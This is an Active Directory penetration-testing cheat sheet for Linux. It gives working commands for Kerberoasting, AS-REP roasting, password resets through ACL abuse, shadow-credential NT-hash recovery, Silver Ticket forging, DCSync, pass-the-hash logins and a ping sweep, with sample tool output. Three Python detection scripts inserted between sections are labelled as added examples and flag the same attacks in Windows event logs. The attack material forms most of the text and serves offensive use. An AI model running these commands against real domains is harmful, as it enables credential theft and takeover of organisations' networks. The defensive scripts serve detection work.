
Active Directory Penetration Testing using Linux

Kerberoasting

#Get TGS Ticket Using GetUserSPNs.py
sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark 

Find Pre-Auth Disabled Users (AS-REP Roasting)

GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10

#crack the AS-REP hashes (hashcat mode 18200 = Kerberos 5 AS-REP etype 23; -a 0 is wordlist mode)
hashcat -a 0 -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

List ACLs/Attributes on which a Specific User has Write Access

bloodyAD --host dc01.domain.local -d domain.local -u User -k get writable --detail
bloodyAD --host dc01.domain.local -d domain.local -u User -p 'password' get writable --detail

Running BloodHound on Linux

#Match the time with the Domain Controller (Kerberos rejects requests from hosts with too much clock skew)
sudo apt-get install ntpdate
sudo ntpdate <DC IP>

#Add the DC host name to /etc/hosts if there is no DNS resolution for the domain

#Once you have creds for any user, run BloodHound.py to look for privilege-escalation paths
git clone https://github.com/dirkjanm/BloodHound.py
cd BloodHound.py && pip install .
bloodhound-python -u UserName -p "P@SSW)RD!" -d steins.local -ns 10.10.10.10 -c All

Abusing GenericAll or ForceChangePassword or Password Reset

git clone https://github.com/CravateRouge/bloodyAD
cd bloodyAD

#User1 has GenericAll permissions on User2
#Change the password of User2
python bloodyAD.py -u "User1" -p "Password1" -d "domain.local" --host "10.10.10.4" set password "User2" "12345678"

#Method 2: reset the password with impacket-changepasswd, authenticating as the controlled user with its NT hash (LMhash:NThash, LM part left empty)
impacket-changepasswd 'domain.local'/'TargetUser' -reset -altuser 'ControlledUser' -althash ':1233432234'

#Change the password over Kerberos when you only have the NT hash: request a TGT with the hash, then point KRB5CCNAME at it
sudo ntpdate -s 10.10.10.10
impacket-getTGT domain.local/d.baker -hashes 12312321:12312213
export KRB5CCNAME=$(pwd)/d.baker.ccache
bloodyAD --host "dc01.domain.local" --kerberos -d "domain.local" --dc-ip "10.10.10.10" set password "a.carter" "12345678@abc"

#Method 3: change the password with pth-net (pass-the-hash over SMB/RPC; needs NTLM auth enabled)
pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"

#Method 4: bloodyAD accepts the NT hash as ':NThash' in place of the password
bloodyAD -u 'ControlledUser' -p ':1a56d4as156da4s56asdadasd556' -d domain.local --dc-ip 10.10.10.10 set password sam 'P@ssw0rd!'

Abusing GenericAll - Targeted AS-REP Roasting - Disabling Pre-Auth

#Use this path when you have an NT hash instead of credentials;
#with a username/password, use targetedKerberoast instead (next section)

#Request a TGT; append $ for machine/computer accounts, not for user accounts
impacket-getTGT Domain.Local/ControlledUser$ -hashes f2w34r34eg54t354g345213:g3t343fg434tg343t4334gqgu

#Point the KRB5CCNAME environment variable at the TGT
export KRB5CCNAME=$(pwd)/ControlledUser$.ccache

#Disable pre-auth for TargetUser (set DONT_REQ_PREAUTH); -k selects Kerberos auth and uses the ticket in KRB5CCNAME
bloodyAD --host dc01.domain.local -d "Domain.Local" --dc-ip 10.10.10.10 -k add uac TargetUserName -f DONT_REQ_PREAUTH

#Get the list of users
netexec smb dc01.domain.local -u ControlledUser$ -k --use-kcache --rid-brute | grep "SidTypeUser" | cut -d "\\" -f2 | cut -d " " -f1 > users.txt

#Dump the AS-REP hashes of the pre-auth disabled users
GetNPUsers.py domain.local/ -usersfile users.txt -outputfile hash.txt -dc-ip 10.10.10.10

#Crack the hash (AS-REP hashes are hashcat mode 18200, not 13100)
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force

Abusing GenericWrite / Shadow Credential Attack

targetedKerberoast is a Python script that, like many others (e.g. GetUserSPNs.py), prints "kerberoast" hashes for user accounts that have an SPN set. In addition, for each user without an SPN it tries to set one (abusing a write permission on the servicePrincipalName attribute), prints the "kerberoast" hash and then deletes the temporary SPN it set for that operation. This is called targeted Kerberoasting.

git clone https://github.com/ShutdownRepo/targetedKerberoast.git
cd targetedKerberoast
python -m pip install -r requirements.txt

#-o writes the TGS-REP hashes to a file for cracking
targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword' --dc-ip 10.10.10.10 -o hash.txt

#Crack the hash (TGS-REP hashes are hashcat mode 13100)
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force
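A defender-side counterpart to the Kerberoasting, AS-REP roasting (pre-auth disabled users / DONT_REQ_PREAUTH) and targeted Kerberoasting steps above, added here as an example and not part of the original post: it scans Domain Controller Security events 4769, 4768 and 4738 for the traces those steps leave (RC4 service tickets for user SPNs, TGTs issued without pre-authentication, and the UAC change that disables pre-auth). Field names follow the Windows EventData schema; the event dicts, account names, addresses and the KERBEROAST_THRESHOLD value are constructed assumptions.

```python
"""Flag Kerberoasting and AS-REP-roasting indicators in Domain Controller
Security-log events. Added example, not part of the original post.

Assumes the events have already been parsed into dicts keyed by the
EventData field names of Security events 4768, 4769 and 4738 (the
rendered-text form of the UserAccountControl change is used for 4738).
Everything in SAMPLE_EVENTS is constructed for this example."""
from collections import Counter

RC4_HMAC = "0x17"          # TicketEncryptionType for RC4-HMAC (etype 23)
KERBEROAST_THRESHOLD = 3   # RC4 service tickets per (user, source IP) before alerting (assumed value)

# Constructed sample events (not real log data)
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "mark@STEINS.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "mark@STEINS.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "mark@STEINS.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    # AES ticket for a computer account: ordinary traffic, must not be flagged
    {"EventID": 4769, "TargetUserName": "alice@STEINS.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.20.7", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.20.7", "Status": "0x0"},
    {"EventID": 4738, "SubjectUserName": "ControlledUser$", "TargetUserName": "jdoe",
     "UserAccountControl": "'Don't Require Preauth' - Enabled"},
]


def is_roastable_tgs(ev):
    """4769 that issued an RC4 service ticket for a user (non-computer,
    non-krbtgt) SPN: the TGS-REP an attacker takes offline (hashcat 13100)."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    return (ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def is_asrep_roast(ev):
    """4768 with PreAuthType 0: a TGT issued without pre-authentication, the
    AS-REP an attacker cracks with hashcat 18200 (what GetNPUsers collects)."""
    return (ev.get("EventID") == 4768
            and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0")


def is_preauth_disabled_change(ev):
    """4738 whose UserAccountControl change enables 'Don't Require Preauth':
    the footprint of the 'add uac ... -f DONT_REQ_PREAUTH' step."""
    uac = ev.get("UserAccountControl", "")
    return (ev.get("EventID") == 4738
            and "Don't Require Preauth" in uac
            and "Enabled" in uac)


def analyse(events, threshold=KERBEROAST_THRESHOLD):
    """Return findings as (rule, target_user, detail) tuples."""
    findings = []
    rc4_requests = Counter()
    for ev in events:
        if is_roastable_tgs(ev):
            rc4_requests[(ev["TargetUserName"], ev["IpAddress"])] += 1
        elif is_asrep_roast(ev):
            findings.append(("asrep_roast", ev["TargetUserName"], ev["IpAddress"]))
        elif is_preauth_disabled_change(ev):
            findings.append(("preauth_disabled", ev["TargetUserName"], ev["SubjectUserName"]))
    # Many RC4 service tickets from one requester is the Kerberoasting signal;
    # a single request for a service the user actually uses is normal.
    for (user, ip), n in rc4_requests.items():
        if n >= threshold:
            findings.append(("kerberoast", user, f"{n} RC4 service tickets from {ip}"))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

The RC4 filter catches the default behaviour of the roasting tools above; tickets requested with AES (hashcat modes 19600/19700) are only visible through the per-requester volume, so the threshold matters more than the etype check. Service accounts with long random passwords or gMSAs, AES-only service accounts, and never leaving DONT_REQ_PREAUTH set are the mitigations the same events point at.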

####### If you are unable to crack the Kerberoast hash ########
# Next option is to get the NT hash of the target and pass the hash to log in
# Shadow Credentials attack: add a key credential (certificate) to the target, use that cert to get a TGT (PKINIT),
# then use the TGT to recover the NT hash
# Use either of the methods below

#METHOD 1 ###### Using certipy-ad ##############
#mostly works on certificate authority users (CA_SVC)
certipy-ad shadow -u 'ControlledUser' -p 'P@ssw0rd!' -dc-ip '10.10.10.10' -account 'Victim_User' auto

#METHOD 2 ###### Using pywhisker & PKINITtools ##########

git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
python -m pip install -r requirements.txt
sudo python setup.py install

# Add a key credential (shadow credential) to the victim's msDS-KeyCredentialLink attribute
pywhisker -d "DOMAIN.Local" -u "ControlledUser" -p "P@SSw0rd!" --target "victim_user" --action "add"
[+] Saved PFX (#PKCS12) certificate & key at path: XNGPSfJF.pfx
[*] Must be used with password: Tg8nymEvBWvLLsJoGmXA
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

# Install PKINITtools
git clone https://github.com/dirkjanm/PKINITtools
cd PKINITtools
pip3 install impacket minikerberos

#In case of libcrypto errors
pip3 install -I git+https://github.com/wbond/oscrypto.git

# Obtain a TGT 
# Use the -cert-pfx & -pfx-pass from pywhisker
python ./gettgtpkinit.py -cert-pfx ./XNGPSfJF.pfx -pfx-pass Tg8nymEvBWvLLsJoGmXA DOMAIN.Local/victim_user TGT.ccache
[*] INFO:minikerberos:0eea2afda8e666301911b3cd28f5b0004f59fb9ee71b04ba2bd507354e7d6691
[*] INFO:minikerberos:Saved TGT to file

#Point KRB5CCNAME at the TGT.ccache file
export KRB5CCNAME=/home/user/TGT.ccache

#Get NT Hash 
#Use the key from gettgtpkinit.py 
python getnthash.py -key 0eea2afda8e666301911b3cd28f5b0004f59fb9ee71b04ba2bd507354e7d6691 DOMAIN.Local/victim_user
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[+] Recovered NT Hash b121d1522bddd4578c97g5a6a1158891

#use evil-winrm to login
evil-winrm  -i 10.10.10.10 -u victim_user -H b121d1522bddd4578c97g5a6a1158891

Abusing GenericWrite on a Group - Adding a User to the Target Group

# Adding a user when you have username/password 
net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

#Adding a user when you have the NT hash - this only works when NTLM auth is enabled
pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"

#Verify that the user was added successfully
net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

Adding a user when you only have the NT hash and NTLM auth is not enabled (Kerberos only): get a TGT with the hash first (see above) and authenticate with -k
#List the members of the group
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -u 'ControlledUser$' -k get object "CN=TargetGroup,OU=Target,DC=Domain,DC=Local" --attr member

#add yourself/ControlledUser to the group 
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -u 'ControlledUser$' -k add groupMember "CN=TargetGroup,OU=Target,DC=Domain,DC=Local" 'UserToAddtoGroup$'

#Validate if the user is now added to the target group
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -u 'ControlledUser$' -k get object "CN=TargetGroup,OU=Target,DC=Domain,DC=Local" --attr member

Abusing WriteOwner on a Group

Example scenario: `USER1` has WriteOwner permissions on `dev_group@DOMAIN.LOCAL`, and that group contains the `dev_user` user

#change the ownership of the object
owneredit.py -action write -new-owner 'USER1' -target 'dev_group' 'DOMAIN.LOCAL'/'USER1':'P@ssw0rd!'

#To abuse ownership of a group object, grant yourself the WriteMembers (AddMember) right
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'USER1' -target-dn 'CN=dev_group,CN=USERS,DC=DOMAIN,DC=LOCAL' 'DOMAIN.LOCAL'/'USER1':'P@ssw0rd!'

# Add yourself/user to the group
net rpc group addmem "dev_group" "USER1" -U 'DOMAIN.LOCAL'/'USER1'%'P@ssw0rd!' -S "dc01.DOMAIN.LOCAL"

#Check that the user was added successfully
net rpc group members "dev_group" -U 'DOMAIN.LOCAL'/'USER1'%'P@ssw0rd!' -S "dc01.DOMAIN.LOCAL"

Abusing WriteOwner Permission on a User

#ControllerUser has WriteOwner permissions on  Victim_User
owneredit.py -action write -new-owner 'ControllerUser' -target 'Victim_User' 'DOMAIN.Local'/'ControllerUser':'Controlled_Passwd'

# Set full control of Victim_User to ControllerUser
dacledit.py -action 'write' -rights 'FullControl' -principal 'ControllerUser' -target 'Victim_User' 'DOMAIN.Local'/'ControllerUser':'Controlled_Passwd'

#install Certipy
pip3 install certipy-ad

#Use Certipy's `shadow auto` command to retrieve the NT hash of the victim
certipy shadow auto -u 'ControllerUser@DOMAIN.Local' -p "Controlled_Passwd" -account 'Victim_User' -dc-ip '10.10.10.10'
[*] Successfully restored the old Key Credentials for 'Victim_User'
[*] NT hash for 'Victim_User': b121d1522bddd4578c97g5a6a1158891

#use evil-winrm to login
evil-winrm  -i 10.10.10.10 -u victim_user -H b121d1522bddd4578c97g5a6a1158891

Requesting TGT

impacket-getTGT domain.local/Username:'P@ssw0rd' -dc-ip 10.10.10.10
impacket-getTGT domain.local/Username@dc01.domain.local -dc-ip 10.10.10.10

export KRB5CCNAME=$(pwd)/username.ccache

evil-winrm -i dc01.domain.local -r domain.local

Forging a Silver Ticket

A Silver Ticket attack involves forging a Kerberos service ticket (TGS) to gain unauthorized access to specific services (SPNs) on a Windows domain without needing interaction with the Domain Controller (DC). Unlike a Golden Ticket, which compromises the KRBTGT account and can create tickets for any service, a Silver Ticket is limited to the service for which it is forged.

#get the domain SID (any valid account - user, machine or service - can query it)
nxc ldap dc-01.domain.local -u 'ControlledUser' -p 'Password' --get-sid

#Forge a Kerberos service ticket (TGS) for a specific SPN using the NT hash of the account that owns the SPN (the computer account for CIFS/HOST)
#The TGS (Ticket Granting Service) ticket is generated without any communication with the Key Distribution Center (KDC)
#SPN examples - MSSQLSvc/sqlserver.domain.local, HTTP/webserver.domain.local, CIFS/server.domain.local
impacket-ticketer -nthash 1a21d6fa64sdfsd1sd4sd5sr5e123 -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX -domain domain.local -spn cifs/server.domain.local Administrator

#The forged Silver Ticket is stored as a Kerberos credential cache (ccache) file; export it in KRB5CCNAME to use it
export KRB5CCNAME=Administrator.ccache

#log in via any of the means below
evil-winrm -i server.domain.local -r domain.local
smbclient.py -k -no-pass server.domain.local
psexec.py domain.local/Administrator@server.domain.local -k -no-pass
wmiexec.py domain.local/Administrator@server.domain.local -k -no-pass
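Because a Silver Ticket is minted without the KDC, the Domain Controllers never log a 4769 for it while the target server still logs a Kerberos 4624 when the ticket is presented. The correlation below, added here as an example and not part of the original post, uses exactly that gap: every Kerberos network logon on the member server is checked for a matching service-ticket request from the DCs for the server's computer account. The event dicts, host names, timestamps and addresses are constructed; the field names follow the Security-log EventData schema.

```python
"""Surface service logons the KDC never issued a ticket for, the signature of
a forged Silver Ticket. Added example, not part of the original post.

Correlates 4624 network logons authenticated with Kerberos on a member server
against 4769 service-ticket events collected from all Domain Controllers for
that server's computer account. Events, names and timestamps below are
constructed for this example."""
from datetime import datetime, timedelta

# Service tickets are cached and reused, so a legitimate logon may be backed
# by a 4769 issued up to the maximum service ticket lifetime earlier
# (10 hours by default policy).
MAX_TICKET_AGE = timedelta(hours=10)


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


# Constructed DC events: one genuine service ticket for alice to SERVER$
DC_EVENTS = [
    {"EventID": 4769, "Time": "2024-05-01T09:00:05",
     "TargetUserName": "alice@DOMAIN.LOCAL", "ServiceName": "SERVER$", "Status": "0x0"},
]

# Constructed member-server (SERVER) events: alice's logon is backed by the
# ticket above; the Administrator logon has no ticket issued anywhere.
SERVER_EVENTS = [
    {"EventID": 4624, "Time": "2024-05-01T09:00:09", "TargetUserName": "alice",
     "TargetDomainName": "DOMAIN", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.20.7"},
    {"EventID": 4624, "Time": "2024-05-01T09:12:41", "TargetUserName": "Administrator",
     "TargetDomainName": "DOMAIN", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.14.5"},
]


def tgs_index(dc_events, service_account):
    """Map account name (lower-cased, realm stripped) to the times the DCs
    issued a service ticket for service_account to that account."""
    idx = {}
    for ev in dc_events:
        if (ev.get("EventID") == 4769 and ev.get("Status") == "0x0"
                and ev.get("ServiceName", "").lower() == service_account.lower()):
            user = ev["TargetUserName"].split("@")[0].lower()
            idx.setdefault(user, []).append(_ts(ev["Time"]))
    return idx


def unbacked_kerberos_logons(server_events, dc_events, service_account, max_age=MAX_TICKET_AGE):
    """Return (user, source_ip, time) for every Kerberos 4624 on the server
    that no DC issued a service ticket for within max_age before the logon."""
    idx = tgs_index(dc_events, service_account)
    suspicious = []
    for ev in server_events:
        if ev.get("EventID") != 4624 or ev.get("AuthenticationPackageName") != "Kerberos":
            continue
        user = ev["TargetUserName"].lower()
        logon_time = _ts(ev["Time"])
        backed = any(logon_time - max_age <= issued <= logon_time
                     for issued in idx.get(user, []))
        if not backed:
            suspicious.append((user, ev["IpAddress"], ev["Time"]))
    return suspicious


if __name__ == "__main__":
    for hit in unbacked_kerberos_logons(SERVER_EVENTS, DC_EVENTS, "SERVER$"):
        print("Kerberos logon with no matching TGS request:", hit)
```

The check is only as good as the 4769 collection: any DC in the site can issue the ticket, so the DC side must be fed from all of them, and the window must cover the ticket lifetime policy actually in force. Rotating the computer account password (twice, so the old key is gone) invalidates the tickets this detects, and the forged ticket carries no KDC-signed PAC that a service could verify, which is why PAC validation is the complementary control.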

DCSync Attack

secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'
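The shadow credential, targetedKerberoast, WriteOwner/dacledit, group-membership and DCSync steps above all leave Directory Service audit events behind: attribute writes are logged as 5136 (msDS-KeyCredentialLink, servicePrincipalName, nTSecurityDescriptor, member) and replication access as 4662 with the DS-Replication-Get-Changes extended-right GUIDs. The watcher below, added here as an example and not part of the original post or of any of these tools, classifies such events and also pairs an SPN "value added" with the later "value deleted" on the same object, which is the targetedKerberoast footprint. It assumes the relevant audit subcategories and SACLs are enabled; the event dicts and principal names are constructed.

```python
"""Directory Service audit watcher for the object writes behind the ACL-abuse
steps on this page and for DCSync. Added example, not part of the original post.

Assumes 'Audit Directory Service Changes' (event 5136) and 'Audit Directory
Service Access' (event 4662) are enabled with SACLs on the objects, and that
events arrive as dicts keyed by their EventData field names. SAMPLE_EVENTS
are constructed for this example."""

# LDAP display names (lower-cased) of attributes whose modification maps to a step on this page
WATCHED_ATTRIBUTES = {
    "msds-keycredentiallink": "shadow credential written (pywhisker / certipy shadow)",
    "serviceprincipalname": "SPN written on an account (targetedKerberoast)",
    "ntsecuritydescriptor": "owner or DACL rewritten (owneredit / dacledit)",
    "member": "group membership changed (net rpc group addmem / bloodyAD add groupMember)",
}
VALUE_ADDED = "%%14674"     # 5136 OperationType: value added
VALUE_DELETED = "%%14675"   # 5136 OperationType: value deleted

# Extended-right GUIDs DCSync needs: DS-Replication-Get-Changes and -All
REPLICATION_RIGHTS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
)

# Constructed sample events (not real log data)
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "ControlledUser",
     "ObjectDN": "CN=Victim_User,CN=Users,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "controlledUser",
     "ObjectDN": "CN=jdoe,CN=Users,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "abc/def",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "controlledUser",
     "ObjectDN": "CN=jdoe,CN=Users,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "abc/def",
     "OperationType": "%%14675"},
    {"EventID": 5136, "SubjectUserName": "USER1",
     "ObjectDN": "CN=dev_group,CN=Users,DC=DOMAIN,DC=LOCAL",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    # Benign write to an unwatched attribute: must be ignored
    {"EventID": 5136, "SubjectUserName": "svc_noise",
     "ObjectDN": "CN=WS01,CN=Computers,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
    # A DC replicating with another DC is normal; a user account doing it is DCSync
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "DOMAIN",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectDomainName": "testlab",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def classify_5136(ev):
    """Return (attribute, operation, subject, object_dn, value) for a 5136
    event that touches a watched attribute, else None."""
    attr = ev.get("AttributeLDAPDisplayName", "").lower()
    if ev.get("EventID") != 5136 or attr not in WATCHED_ATTRIBUTES:
        return None
    op = {VALUE_ADDED: "added", VALUE_DELETED: "deleted"}.get(ev.get("OperationType"), "modified")
    return (attr, op, ev.get("SubjectUserName", ""), ev.get("ObjectDN", ""), ev.get("AttributeValue"))


def is_dcsync(ev, dc_accounts):
    """4662 in which a principal other than a DC computer account exercised a
    replication right. dc_accounts is a set of lower-cased sAMAccountNames."""
    if ev.get("EventID") != 4662:
        return False
    props = ev.get("Properties", "").lower()
    subject = ev.get("SubjectUserName", "").lower()
    return any(guid in props for guid in REPLICATION_RIGHTS) and subject not in dc_accounts


def scan(events, dc_accounts):
    """Return findings in event order; an SPN add followed by the matching
    delete on the same object by the same subject is reported separately."""
    findings = []
    pending_spn = set()
    dcs = {d.lower() for d in dc_accounts}
    for ev in events:
        hit = classify_5136(ev)
        if hit:
            attr, op, subject, dn, value = hit
            findings.append(("ds_change", WATCHED_ATTRIBUTES[attr], op, subject, dn))
            key = (subject.lower(), dn.lower(), value)
            if attr == "serviceprincipalname" and op == "added":
                pending_spn.add(key)
            elif attr == "serviceprincipalname" and op == "deleted" and key in pending_spn:
                findings.append(("targeted_kerberoast_pattern", subject, dn))
        elif is_dcsync(ev, dcs):
            findings.append(("dcsync", ev["SubjectUserName"], ev.get("SubjectDomainName", "")))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS, ["DC01$"]):
        print(*finding, sep=" | ")
```

Legitimate non-DC replication consumers (directory synchronisation service accounts, for instance) belong on the dc_accounts allow-list rather than in the alert queue, and 5136 only fires for objects whose SACL audits the write, so the watch list is also a list of attributes worth auditing on privileged users and groups.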

Enabling a User Account

#List userAccountControl attribute of all the users 
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -k get search --filter "(objectClass=user)" --attr userAccountControl

#enable a user account (clear the ACCOUNTDISABLE flag)
bloodyAD --host dc01.domain.local -d "domain.local" --dc-ip 10.10.10.10 -k remove uac $Disabled_USER -f ACCOUNTDISABLE

#Validate whether the user account is now enabled
bloodyAD --host "dc01.domain.local" -d "domain.local" --kerberos --dc-ip 10.10.10.10 -k get search --filter "(objectClass=user)" --attr userAccountControl

krbrelayx

git clone https://github.com/dirkjanm/krbrelayx

#In case of an OpenSSL error ("'OpenSSL.crypto' has no attribute 'PKCS12'"), pin pyOpenSSL
pip install pyOpenSSL==24.0.0 --break-system-packages


Ping Sweep

#!/bin/bash
# Usage: ./ping_sweep.sh 192.168.1   (first three octets of a /24)

network="$1"
if [ -z "$network" ]; then
    echo "Usage: $0 <first three octets, e.g. 192.168.1>" >&2
    exit 1
fi

for ip in {1..254}; do
    # one echo request with a one-second timeout; a reply line contains "64 bytes"
    if ping -c 1 -W 1 "$network.$ip" | grep -q "64 bytes"; then
        echo "Host $network.$ip is up"
    fi
done


Save the above script as ping_sweep.sh, then:
chmod +x ping_sweep.sh
./ping_sweep.sh 192.168.1
